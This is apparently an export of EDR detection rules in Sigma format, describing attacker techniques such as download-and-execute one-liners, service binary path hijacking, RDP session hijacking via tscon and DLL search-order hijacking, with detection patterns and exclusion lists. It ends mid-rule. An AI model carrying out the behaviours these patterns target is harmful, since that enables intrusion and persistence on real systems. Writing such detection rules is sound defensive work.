"rule_description": "Detects a suspicious DLL load with a .pdb extension.\nThis command is seen in Turla's Mosquito malware, which is commonly delivered through spearphishing attachments.\nThe malware will place a DLL file with a \".pdb\" extension at a random or deep path in %APPDATA% and use RunDLL32.exe to load it.\nIt is recommended to investigate the loaded pdb file, as well as other actions taken by the parent process.\n",
"rule_creation_date": "2022-12-06",
"rule_modified_date": "2025-01-29",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1218.011",
"attack.t1566.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "54eff1c1-eb8a-43c1-a752-478f492a2912",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.625181Z",
"creation_date": "2026-03-23T11:45:34.625183Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.625187Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blog.malwaremustdie.org/2015/07/mmd-0037-2015-bad-shellshock.html",
"https://attack.mitre.org/techniques/T1105/",
"https://attack.mitre.org/techniques/T1222/002/"
],
"name": "t1105_linux_suspicious_download_execute.yml",
"content": "title: Suspicious Download and Execution of a Remote File (Linux)\nid: 54eff1c1-eb8a-43c1-a752-478f492a2912\ndescription: |\n Detects when curl or wget are used to download a remote file, followed by a chmod to execute it (as a one liner).\n Attackers often use this technique to execute payloads for initial access (by luring a user into executing the command) or simply because of its simplicity.\n It is recommended to investigate the remote file and the actions it performs to ensure it is legitimate.\nreferences:\n - https://blog.malwaremustdie.org/2015/07/mmd-0037-2015-bad-shellshock.html\n - https://attack.mitre.org/techniques/T1105/\n - https://attack.mitre.org/techniques/T1222/002/\ndate: 2021/09/28\nmodified: 2025/12/18\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1105\n - attack.defense_evasion\n - attack.t1222.002\n - attack.execution\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.FileDownload\n - classification.Linux.Behavior.InitialAccess\n - classification.Linux.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith:\n - '/sh'\n - '/bash'\n - '/csh'\n - '/dash'\n - '/ksh'\n - '/tcsh'\n - '/zsh'\n CommandLine|contains:\n - 'wget*chmod*+x'\n - 'wget*chmod* 7?? '\n - 'curl*chmod*+x'\n - 'curl*chmod* 7?? '\n\n exclusion_script:\n CommandLine|contains:\n - 'sh -c #!/bin/sh'\n - 'sh -c #!/bin/bash'\n - 'sh -c #!/usr/bin/env bash'\n - 'sh -c #! 
/usr/bin/env bash'\n\n exclusion_parentimage:\n ParentImage:\n - '/usr/sbin/cron'\n - '/usr/sbin/crond'\n - '/usr/bin/make'\n\n exclusion_coder:\n CommandLine|contains: '# This is to allow folks to exec into a failed workspace and poke around to'\n\n exclusion_songui:\n Ancestors|contains:\n - '/vendor_android/out/soong_ui'\n - '/android/out/soong_ui'\n\n exclusion_ninja:\n Ancestors|contains: '/bin/ninja|'\n\n exclusion_containers:\n Ancestors|contains:\n - '/usr/bin/runc|/usr/bin/dockerd'\n - '/usr/sbin/runc|/usr/sbin/dockerd'\n - '/usr/sbin/runc|/usr/bin/dockerd'\n - '/usr/bin/containerd-shim-runc-v2'\n - '/usr/sbin/containerd-shim-runc-v2'\n - '|/usr/local/bin/containerd-shim-runc-v2|'\n - '|/snap/docker/*/bin/dockerd|'\n - '|/usr/bin/podman|'\n\n exclusion_gitlab:\n Ancestors|contains: '|/usr/bin/gitlab-runner|'\n\n exclusion_proxmox:\n Ancestors|contains: '|/usr/libexec/proxmox/proxmox-termproxy|'\n\n exclusion_ssh:\n CommandLine|contains: '/bin/sh -c ssh * sh << ?EOSSH?'\n\n exclusion_claude:\n ParentCommandLine:\n - 'claude'\n - 'node /home/*/.nvm/versions/node/v*/bin/claude'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "54eff1c1-eb8a-43c1-a752-478f492a2912",
"rule_name": "Suspicious Download and Execution of a Remote File (Linux)",
"rule_description": "Detects when curl or wget are used to download a remote file, followed by a chmod to execute it (as a one liner).\nAttackers often use this technique to execute payloads for initial access (by luring a user into executing the command) or simply because of its simplicity.\nIt is recommended to investigate the remote file and the actions it performs to ensure it is legitimate.\n",
"rule_creation_date": "2021-09-28",
"rule_modified_date": "2025-12-18",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1105",
"attack.t1222.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "550ab391-082f-41b0-82d9-2dd1a6308d59",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.604684Z",
"creation_date": "2026-03-23T11:45:34.604687Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.604695Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/juliourena/SharpNoPSExec",
"https://attack.mitre.org/techniques/T1569/002/"
],
"name": "t1569_002_suspicious_service_binary_path_modification.yml",
"content": "title: Suspicious Service Binary Path Modification\nid: 550ab391-082f-41b0-82d9-2dd1a6308d59\ndescription: |\n Detects the suspicious modification of a service's binary path, specifically for services that are disabled by default and have LocalSystem privileges.\n Attackers may try to modify existing services to serve their own payload instead of the legitmate service binary.\n This technique is for instance used by the SharpNoPSExec tool.\n It is recommended to analyze the new binary set for service to look for malicious content as well as to investigate the user performing this action to determine whether it is legitimate.\nreferences:\n - https://github.com/juliourena/SharpNoPSExec\n - https://attack.mitre.org/techniques/T1569/002/\ndate: 2021/05/03\nmodified: 2025/04/03\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1569.002\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Exploitation\n - classification.Windows.Behavior.Lateralization\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'SetValue'\n Image|endswith: '\\services.exe'\n # Lists services that are disable by default and have LocalSystem privileges\n TargetObject:\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\AppVClient\\ImagePath' # Windows 10, Windows Server 2019, Windows Server 2016\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\AxInstSV\\ImagePath' # Windows Server 2019\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\Browser\\ImagePath' # Windows Server 2016, Windows Server 2012 r2\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\CscService\\ImagePath' # Windows Server 2019, Windows Server 2016\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\DialogBlockingService\\ImagePath' # Windows 10\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\dmwappushservice\\ImagePath' # Windows Server 2019\n - 
'HKLM\\SYSTEM\\CurrentControlSet\\Services\\GraphicsPerfSvc\\ImagePath' # Windows Server 2019\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\lfsvc\\ImagePath' # Windows Server 2019\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\MsKeyboardFilter\\ImagePath' # Windows 10\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\NtFrs\\ImagePath' # Windows Server 2019\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\PushToInstall\\ImagePath' # Windows Server 2019\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\RemoteAccess\\ImagePath' # Windows 10, Windows Server 2016, Windows Server 2012 r2\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\ScDeviceEnum\\ImagePath' # Windows Server 2019\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\SensorDataService\\ImagePath' # Windows Server 2019\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\ImagePath' # Windows Server 2019, Windows Server 2012 r2\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\shpamsvc\\ImagePath' # Windows 10, Windows Server 2019\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\ssh-agent\\ImagePath' # Windows 10, Windows Server 2019\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\UevAgentService\\ImagePath' # Windows 10, Windows Server 2019, Windows Server 2016\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\uhssvc\\ImagePath' # Windows 10\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\WalletService\\ImagePath' # Windows Server 2019\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\wisvc\\ImagePath' # Windows Server 2019\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\WSearch\\ImagePath' # Windows Server 2019, Windows Server 2016\n\n filter_empty:\n Details:\n - '(Empty)'\n - ''\n - '\"\"'\n\n exclusion_legitimate_svc_binaries:\n Details|contains:\n - '?:\\Program Files\\Microsoft Update Health Tools\\uhssvc.exe' # uhssvc\n - '?:\\Windows\\system32\\AgentService.exe' # UevAgentService\n - '?:\\Windows\\system32\\AppVClient.exe' # AppVClient\n - '?:\\Windows\\system32\\ntfrs.exe' # NtFrs\n - 
'?SystemRoot?\\system32\\ntfrs.exe' # NtFrs\n - '*\\OpenSSH\\ssh-agent.exe' # ssh-agent\n - '*\\OpenSSH-Win64\\ssh-agent.exe' # ssh-agent\n - '?:\\Windows\\system32\\SearchIndexer.exe ' # WSearch\n - '%systemroot%\\system32\\SearchIndexer.exe ' # WSearch\n - '?:\\Windows\\System32\\SensorDataService.exe' # SensorDataService\n - '?:\\Windows\\system32\\svchost.exe -k ' # AxInstSV, Browser, CscService, DialogBlockingService, dmwappushservice, GraphicsPerfSvc, lfsvc, MsKeyboardFilter, PushToInstall, RemoteAccess, ScDeviceEnum, SharedAccess, shpamsvc, WalletService, wisvc\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "550ab391-082f-41b0-82d9-2dd1a6308d59",
"rule_name": "Suspicious Service Binary Path Modification",
"rule_description": "Detects the suspicious modification of a service's binary path, specifically for services that are disabled by default and have LocalSystem privileges.\nAttackers may try to modify existing services to serve their own payload instead of the legitimate service binary.\nThis technique is for instance used by the SharpNoPSExec tool.\nIt is recommended to analyze the new binary set for the service to look for malicious content as well as to investigate the user performing this action to determine whether it is legitimate.\n",
"rule_creation_date": "2021-05-03",
"rule_modified_date": "2025-04-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1569.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "55220ced-81e7-4e5d-a0e9-929ac80f50cf",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.076643Z",
"creation_date": "2026-03-23T11:45:34.076645Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.076649Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.ired.team/offensive-security/lateral-movement/t1076-rdp-hijacking-for-lateral-movement",
"https://blog.gentilkiwi.com/securite/vol-de-session-rdp",
"https://attack.mitre.org/techniques/T1563/002/"
],
"name": "t1563_002_tscon_usage.yml",
"content": "title: Possible Lateral Movement via Tscon\nid: 55220ced-81e7-4e5d-a0e9-929ac80f50cf\ndescription: |\n Detects the usage of the tscon.exe utility. Terminal Services Console (tscon) is used to connect to another session on a Remote Desktop Session Host server.\n This can be used by an attacker with credentials to try and move laterally and acquire more credentials.\n To investigate this alert, look for the usage of qwinsta or quser as a way to discover remote RDP sessions. HarfangLab EDR provides alerts when these binaries are used for discovery.\n It is also recommended to attempt to correlate RDP logins across machines to determine if the tool was used successfully.\nreferences:\n - https://www.ired.team/offensive-security/lateral-movement/t1076-rdp-hijacking-for-lateral-movement\n - https://blog.gentilkiwi.com/securite/vol-de-session-rdp\n - https://attack.mitre.org/techniques/T1563/002/\ndate: 2023/08/25\nmodified: 2025/03/18\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1563.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.Tscon\n - classification.Windows.Behavior.Lateralization\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'tscon.exe'\n\n # There's another rule for this (Hijacking)\n exclusion_system:\n UserSID|startswith: 'S-1-5-18'\n\n exclusion_systancia:\n - ParentImage|endswith:\n - '\\Systancia\\AppliDis\\AppliDis Serveur\\bin\\AppliDis Starter.exe'\n - '\\Systancia\\AppliDis\\AppliDis Serveur\\bin\\ThinDesktop\\adisbureau.exe'\n - GrandparentImage: '?:\\Program Files (x86)\\Systancia\\AppliDis\\AppliDis Serveur\\bin\\ThinDesktop\\AppliDisVDIObserver.exe'\n\n exclusion_osiris:\n ParentImage|endswith: '\\Corwin\\Osiris\\Appli.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\n#level: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "55220ced-81e7-4e5d-a0e9-929ac80f50cf",
"rule_name": "Possible Lateral Movement via Tscon",
"rule_description": "Detects the usage of the tscon.exe utility. Terminal Services Console (tscon) is used to connect to another session on a Remote Desktop Session Host server.\nThis can be used by an attacker with credentials to try and move laterally and acquire more credentials.\nTo investigate this alert, look for the usage of qwinsta or quser as a way to discover remote RDP sessions. HarfangLab EDR provides alerts when these binaries are used for discovery.\nIt is also recommended to attempt to correlate RDP logins across machines to determine if the tool was used successfully.\n",
"rule_creation_date": "2023-08-25",
"rule_modified_date": "2025-03-18",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1563.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "55244098-589e-4076-b4a9-0b6889dbc53c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.078282Z",
"creation_date": "2026-03-23T11:45:34.078284Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.078289Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://positive.security/blog/ms-officecmd-rce",
"https://attack.mitre.org/techniques/T1090",
"https://attack.mitre.org/techniques/T1573"
],
"name": "t1090_electron_proxy.yml",
"content": "title: Insecure Proxy Settings Set on Electron Application\nid: 55244098-589e-4076-b4a9-0b6889dbc53c\ndescription: |\n Detects the execution of an Electron-based application (Teams, Skype, etc.) using insecure proxy settings.\n This could be used to monitor the network traffic of those applications and steal credentials.\n It is recommended to investigate other malicious activity on the current machine and look for any lateralization alerts.\nreferences:\n - https://positive.security/blog/ms-officecmd-rce\n - https://attack.mitre.org/techniques/T1090\n - https://attack.mitre.org/techniques/T1573\ndate: 2021/12/17\nmodified: 2025/01/13\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1090\n - attack.t1573\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.SensitiveInformation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n app_skype:\n - Image|endswith: '\\skype.exe'\n - OriginalFileName: 'Skype.exe'\n app_teams:\n - Image|endswith: '\\Teams.exe'\n - OriginalFileName: 'Teams.exe'\n selection:\n CommandLine|contains|all:\n - '--ignore-certificate-errors'\n - '--host-rules'\n condition: 1 of app_* and selection\nlevel: medium\n# level: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "55244098-589e-4076-b4a9-0b6889dbc53c",
"rule_name": "Insecure Proxy Settings Set on Electron Application",
"rule_description": "Detects the execution of an Electron-based application (Teams, Skype, etc.) using insecure proxy settings.\nThis could be used to monitor the network traffic of those applications and steal credentials.\nIt is recommended to investigate other malicious activity on the current machine and look for any lateralization alerts.\n",
"rule_creation_date": "2021-12-17",
"rule_modified_date": "2025-01-13",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1090",
"attack.t1573"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5557b16c-8005-48ea-9059-b7641cba9823",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.468858Z",
"creation_date": "2026-03-23T11:45:34.627045Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.627049Z",
"rule_level": "low",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://man7.org/linux/man-pages/man8/arp.8.html",
"https://gtfobins.github.io/gtfobins/arp/",
"https://attack.mitre.org/techniques/T1016/",
"https://attack.mitre.org/techniques/T1018/",
"https://attack.mitre.org/software/S0099/"
],
"name": "t1016_arp_linux.yml",
"content": "title: Arp Execution (Linux)\nid: 5557b16c-8005-48ea-9059-b7641cba9823\ndescription: |\n Detects the execution of arp, a tool used to display information about the system's Address Resolution Protocol (ARP) cache.\n Attackers may use it during discovery phase to display ARP configuration information on the host or to discover remote systems.\n It is recommended to investigate the parent process for suspicious activities.\nreferences:\n - https://man7.org/linux/man-pages/man8/arp.8.html\n - https://gtfobins.github.io/gtfobins/arp/\n - https://attack.mitre.org/techniques/T1016/\n - https://attack.mitre.org/techniques/T1018/\n - https://attack.mitre.org/software/S0099/\ndate: 2022/12/23\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1016\n - attack.t1018\n - attack.s0099\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.LOLBin.Arp\n - classification.Linux.Behavior.Discovery\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/arp'\n ParentImage|startswith: '?'\n\n # Exclude manual arp launched from a terminal emulator\n exclusion_terminal_emulators:\n GrandparentCommandLine|endswith:\n - '/gnome-terminal-server'\n - '/terminator'\n - '/xfce4-terminal'\n - '/xterm'\n\n exclusion_fusioninventory:\n ParentCommandLine:\n - 'fusioninventory-agent: task NetDiscovery'\n - 'fusioninventory-agent (tag *'\n - '/usr/bin/perl /usr/bin/fusioninventory-agent --daemon --no-fork'\n\n exclusion_qualys:\n - GrandparentImage:\n - '/usr/local/qualys/cloud-agent/bin/qualys-scan-util'\n - '/usr/local/qualys/cloud-agent/bin/qualys-cloud-agent'\n - ProcessAncestors|contains:\n - '|/usr/local/qualys/cloud-agent/bin/qualys-scan-util|'\n - '|/usr/local/qualys/cloud-agent/bin/qualys-cloud-agent|'\n\n exclusion_oracle:\n - ParentImage: '*/oracle/*/agent_*/perl/bin/perl'\n - CurrentDirectory|startswith:\n - '/u01/app/grid/'\n - '/u01/app/oracle/'\n\n exclusion_oracle_oswatcher:\n 
ParentCommandLine|startswith:\n - '/bin/sh ./arpsub.sh '\n - '/bin/sh ./OSWatcher.sh'\n GrandparentCommandLine|startswith: '/bin/sh ./OSWatcher.sh'\n User: 'oracle'\n\n exclusion_oracle_diagsnap:\n ParentImage:\n - '/usr/bin/bash'\n - '/bin/sh'\n - '*/perl/bin/perl'\n # /u01/app/grid/19.9.0.0/perl/bin/perl /u01/app/grid/19.9.0.0/bin/diagsnap.pl start\n GrandparentImage|endswith: '/perl/bin/perl'\n GrandparentCommandLine|contains: '/bin/diagsnap.pl'\n\n exclusion_dsagent:\n ParentCommandLine: '/bin/bash /opt/ds_agent/ds_agent.init start'\n\n exclusion_glpi:\n - GrandparentCommandLine:\n - 'glpi-agent: waiting'\n - 'glpi-agent (tag *): *'\n - '/usr/bin/perl /usr/bin/glpi-agent'\n - '/usr/bin/perl /usr/bin/glpi-agent *'\n - '*/bin/perl */glpi-agent/agent/bin/glpi-agent *'\n - CurrentDirectory:\n - '/opt/glpi-agent/agent/bin'\n - '/opt/glpi-agent/agent/bin/'\n\n exclusion_espcli:\n ParentCommandLine|endswith: '>adrmac.txt'\n GrandparentCommandLine: './espcli_parc'\n\n exclusion_rc3:\n CommandLine: '/sbin/arp -f /etc/ethers'\n ParentCommandLine|startswith: '/bin/bash /etc/rc3.d/S10network'\n\n exclusion_ds_agent:\n ParentCommandLine: '/bin/bash /opt/ds_agent/Linux.init start'\n\n exclusion_run-parts:\n GrandparentImage: '/usr/bin/run-parts'\n\n exclusion_containerd:\n ProcessAncestors|contains:\n - '|/usr/bin/containerd-shim-runc-v2|'\n - '|/usr/bin/docker-containerd-shim-current|'\n\n exclusion_bladelogic:\n ProcessAncestors|contains: '|/opt/bmc/bladelogic/RSCD/bin/rscd_full|'\n\n exclusion_trendmicro:\n ParentCommandLine: '/bin/bash /opt/TrendMicro/vls_agent/vls_agent.init start'\n\n exclusion_puppet:\n - ParentCommandLine: '/usr/bin/ruby /usr/sbin/puppetd'\n - GrandparentCommandLine: '/usr/bin/ruby /usr/sbin/puppetd'\n\n exclusion_facter:\n GrandparentCommandLine|contains:\n - 'sh -c /usr/bin/facter'\n - '/usr/bin/ruby /usr/bin/facter'\n\n exclusion_init:\n ParentCommandLine: '/bin/bash /etc/init.d/network'\n\n exclusion_template_ansible:\n - 
ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n\n exclusion_vscode:\n Ancestors|contains: '|/snap/code/*/usr/share/code/code|'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5557b16c-8005-48ea-9059-b7641cba9823",
"rule_name": "Arp Execution (Linux)",
"rule_description": "Detects the execution of arp, a tool used to display information about the system's Address Resolution Protocol (ARP) cache.\nAttackers may use it during discovery phase to display ARP configuration information on the host or to discover remote systems.\nIt is recommended to investigate the parent process for suspicious activities.\n",
"rule_creation_date": "2022-12-23",
"rule_modified_date": "2026-03-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1016",
"attack.t1018"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5565ad8d-5653-4d91-a582-0e35a93d3dd5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.091416Z",
"creation_date": "2026-03-23T11:45:34.091419Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.091423Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"http://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_phantom_dll_hijacking_fxscover.yml",
"content": "title: Phantom DLL Hijacking via fxscover.exe\nid: 5565ad8d-5653-4d91-a582-0e35a93d3dd5\ndescription: |\n Detects a potential Windows DLL search order hijacking via fxscover.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - http://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/10/06\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - 